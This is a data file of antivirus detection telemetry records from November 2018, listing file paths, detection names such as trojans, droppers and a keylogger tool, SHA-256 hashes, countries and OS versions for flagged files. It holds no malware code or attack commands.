  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-24.categorizing\\056CB4DA505AA394F91880842A3CACEB1501D925D730CB573B524A1FE6FF994C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T10:14:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173538-2c326241', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5097c88c\\AVSCAN-20181102-173501-2461B342\\AVSCAN-20181102-173538-2C326241', filesize=384000, name='TR/Gendal.5319612.#M1.#R1'), hash='2cb9d2290e29b021a245e0ed42ffc3bce9ab92bba0900ef1ae2d102bc5de545b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yolo.dll', filepath='ProgramFilesDir/[PluginsDir]/yolo.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:48:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pizzadox.release.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\MISC\\pizzadox.release\\pizzadox.release.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc44c2ba1e-85ab-eb42-a72d-3d3c1169ab63.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc44C2BA1E-85AB-EB42-A72D-3D3C1169AB63.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M1.#R1'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T21:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.82.#M1.#R1'), hash='242dcedd1ac674fc3b63637faf71ca6efd0c7aea7a382837ed25eec44cb11587', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T22:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-7.categorizing\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\116BE10239F0235823DDF2482C7AE09578A3E13B68C56D7D6A37236C7A4E2687', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:29:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200942-5929f19d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c8e45bbb\\AVSCAN-20181102-200749-4AEBDEA9\\AVSCAN-20181102-200942-5929F19D', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061338-688f4e4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061338-688F4E4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050257-88ebbdbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050257-88EBBDBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053102-75170cba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053102-75170CBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110406-33d80e01', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-110344-AB081772\\AVSCAN-20181102-110406-33D80E01', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000765d', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000765d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='torchsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Torch\\Update\\Download\\TorchSetup.exe', filesize=21584000, name='PUA/SeaSuite.Gen7.#M300.#R603273'), hash='562c0b923499236d736f51bbba5b0f4ea15ec8a542feb752dbb11a2db08d914b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:39:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061251-4cd414be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061251-4CD414BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153708-ed468751', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153708-ED468751', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053132-86b8d2af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053132-86B8D2AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154725-60006682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154725-60006682', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051525-46d4f8f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051525-46D4F8F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054220-093b565b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054220-093B565B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.232\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.232\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054242-167a2e52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054242-167A2E52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053132-872e9706', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053132-872E9706', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.673\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.673\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:42:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050711-20339da4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050711-20339DA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T23:20:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195726-de036286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52475ea7\\AVSCAN-20181102-193432-4E5C606C\\AVSCAN-20181102-195726-DE036286', filesize=2952000, name='PUA/EDownloader.Gen4.#M300.#R300373'), hash='72aab30903f17ad9f94c7083592f2de99d0d75838285374d47be7762fcd26fbc', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:57:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053228-a8233fbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053228-A8233FBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053110-79930e7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053110-79930E7D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054708-b505cd11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054708-B505CD11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T08:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055344-a115478d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055344-A115478D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051835-b796b271', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051835-B796B271', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055527-de234197', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055527-DE234197', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060830-b1015008', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060830-B1015008', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051345-0b2c8e2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051345-0B2C8E2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d73b8fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D73B8FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d8c496a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D8C496A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060321-f919e1f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060321-F919E1F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061035-fb35c725', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061035-FB35C725', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051609-60a75ad5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051609-60A75AD5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:08Z'), dt=datetime.date(2018, 11, 2)),
